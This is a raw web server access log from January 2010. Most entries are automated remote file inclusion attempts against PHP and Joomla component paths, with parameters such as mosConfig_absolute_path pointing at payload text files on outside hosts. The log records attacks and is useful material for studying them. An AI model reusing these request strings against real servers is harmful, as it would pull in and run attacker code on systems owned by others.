212.193.248.181 - - [17/Jan/2010:04:15:07 -0500] "GET /logs/access_log.Q109111400///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
212.193.248.181 - - [17/Jan/2010:04:15:08 -0500] "GET ///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
212.193.248.181 - - [17/Jan/2010:04:15:08 -0500] "GET /logs///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
212.193.248.181 - - [17/Jan/2010:04:15:09 -0500] "GET ///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
212.193.248.181 - - [17/Jan/2010:04:15:09 -0500] "GET /logs/error_log.Q109111400///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.193.248.181 - - [17/Jan/2010:04:15:09 -0500] "GET /logs/error_log.Q109111400///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.7.77 - - [17/Jan/2010:04:15:14 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:14 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:19 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:19 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:20 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:20 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:15:24 -0500] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:15:24 -0500] "GET /logs/access_log.Q109061300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:15:24 -0500] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.34.111.74 - - [17/Jan/2010:04:15:24 -0500] "GET /logs/access_log.Q109061300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:15:32 -0500] "GET /logs/access_log.Q109110400//?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:04:15:34 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.7.77 - - [17/Jan/2010:04:15:43 -0500] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:43 -0500] "GET /logs/access_log.Q109071900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:49 -0500] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:49 -0500] "GET /logs/access_log.Q109071900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:52 -0500] "GET /logs/access_log.Q109062900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:15:52 -0500] "GET /logs/access_log.Q109071900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:04:17:37 -0500] "GET /logs/access_log.Q109071800 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
69.16.230.82 - - [17/Jan/2010:04:17:47 -0500] "GET ///index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:17:47 -0500] "GET /logs///index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:17:47 -0500] "GET /logs/access_log.Q109120200%20%20///index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:17:48 -0500] "GET /logs/access_log.Q109081500%20%20///index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:17:59 -0500] "GET //bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:17:59 -0500] "GET /logs/access_log.Q109072200//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
219.94.198.80 - - [17/Jan/2010:04:17:59 -0500] "GET /logs//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:04:18:34 -0500] "GET /logs/error_log.Q109091000 HTTP/1.0" 200 3095222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.7.77 - - [17/Jan/2010:04:19:02 -0500] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:19:03 -0500] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:04:18:34 -0500] "GET /logs/error_log.Q109091000 HTTP/1.0" 200 3095222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.94.198.80 - - [17/Jan/2010:04:19:13 -0500] "GET /logs/access_log.Q109112100//bbs/delete.php?board_skin_path=http://www.avto-x.ru//banners/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:19:15 -0500] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:19:15 -0500] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:19:23 -0500] "GET /logs/access_log.Q109071900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:19:23 -0500] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:19:46 -0500] "GET ///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:19:46 -0500] "GET /logs///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:19:46 -0500] "GET /logs/access_log.Q109102900%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
212.193.248.181 - - [17/Jan/2010:04:19:58 -0500] "GET /logs///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
69.16.230.82 - - [17/Jan/2010:04:19:58 -0500] "GET /logs/access_log.Q109101600%20%20///index.php?option=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
212.193.248.181 - - [17/Jan/2010:04:19:58 -0500] "GET ///write.php?setup[use_category]=1&dir=http://83.143.148.154:32000/accounts/inc/.vsh/idgog.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
115.68.2.144 - - [17/Jan/2010:04:20:04 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.68.2.144 - - [17/Jan/2010:04:20:04 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
209.59.12.99 - - [17/Jan/2010:04:20:34 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.207.132 - - [17/Jan/2010:04:20:46 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
86.109.170.73 - - [17/Jan/2010:04:20:59 -0500] "GET //?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:20:59 -0500] "GET /logs/access_log.Q109093000%20%20//?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:20:59 -0500] "GET /logs//?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0"
118.217.5.165 - - [17/Jan/2010:04:21:14 -0500] "GET /logs/bbs/good.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.217.5.165 - - [17/Jan/2010:04:21:14 -0500] "GET /bbs/good.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
65.55.207.132 - - [17/Jan/2010:04:21:47 -0500] "GET /logs/access_log.Q109101500 HTTP/1.1" 304 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.130.149.241 - - [17/Jan/2010:04:22:21 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:22:21 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:22:21 -0500] "GET /logs/access_log.Q109080400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:22:32 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:22:32 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.130.149.241 - - [17/Jan/2010:04:22:36 -0500] "GET /logs/access_log.Q109080400%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.srilankatruth.com/OneAdmin/newspublish/id.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
72.34.235.197 - - [17/Jan/2010:04:23:13 -0500] "GET //download.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.34.235.197 - - [17/Jan/2010:04:23:14 -0500] "GET /logs//download.php?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
86.109.170.73 - - [17/Jan/2010:04:23:36 -0500] "GET /logs/error_log.Q109070200%20%20//?_zb_path=http://www.youth.rs/editor/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:23:46 -0500] "GET ///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:23:46 -0500] "GET /logs///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:23:46 -0500] "GET /logs/error_log.Q109111300%20%20///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:23:47 -0500] "GET /logs/error_log.Q109110300%20%20///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:24:08 -0500] "GET /logs///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:24:08 -0500] "GET ///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:24:08 -0500] "GET /logs/error_log.Q109110300///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:24:11 -0500] "GET /logs/error_log.Q109111300///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:25:17 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:25:17 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:25:18 -0500] "GET /logs/access_log.Q109102900%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:25:22 -0500] "GET /logs/access_log.Q109101600%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:04:25:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.37.174 - - [17/Jan/2010:04:25:30 -0500] "GET /logs/access_log.Q110010100 HTTP/1.0" 200 3111417 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.16.230.82 - - [17/Jan/2010:04:26:13 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:26:13 -0500] "GET /logs/access_log.Q109080100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:26:13 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:04:26:20 -0500] "GET /logs/error_log.Q109051500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:26:32 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:26:32 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:26:33 -0500] "GET /logs/access_log.Q109060500//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:27:35 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:27:35 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:27:35 -0500] "GET /logs/error_log.Q109112700//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:27:39 -0500] "GET /logs/error_log.Q109112800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:27:57 -0500] "GET //becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:27:57 -0500] "GET /logs//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:27:57 -0500] "GET /logs/access_log.Q109072900//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:27:59 -0500] "GET ///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:27:59 -0500] "GET /logs/error_log.Q109110300///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:27:59 -0500] "GET /logs/access_log.Q109111300///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:04:28:02 -0500] "GET /logs///index.php?option=com_projectfork&task=§ionid=&id=&mosConfig_absolute_path=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.92.156.53 - - [17/Jan/2010:04:28:03 -0500] "GET /logs/access_log.Q109101700//becommunity/community/index.php?pageurl=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:03 -0500] "GET /logs/error_log.Q109112700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:04 -0500] "GET /logs/access_log.Q109112700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:20 -0500] "GET /logs/access_log.Q109060400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:27 -0500] "GET /logs/access_log.Q109111200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:27 -0500] "GET /logs/error_log.Q109112800%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:27 -0500] "GET /logs/access_log.Q109112800%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:28:33 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:28:34 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:28:35 -0500] "GET /logs/access_log.Q109100400//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:38 -0500] "GET /logs/error_log.Q109100700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:38 -0500] "GET /logs/error_log.Q109060700%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:28:44 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:28:44 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.7.77 - - [17/Jan/2010:04:28:44 -0500] "GET /logs/access_log.Q109060500//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:28:44 -0500] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:04:28:45 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 34521 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
115.68.2.144 - - [17/Jan/2010:04:28:45 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
64.62.128.254 - - [17/Jan/2010:04:28:50 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:28:51 -0500] "GET /logs/access_log.Q109100400//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.62.128.254 - - [17/Jan/2010:04:28:53 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:28:59 -0500] "GET /logs/access_log.Q109121900%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
203.124.149.168 - - [17/Jan/2010:04:29:04 -0500] "GET /logs/error_log.Q109111500%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://snia2009.com//components/com_jce/zfxid1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
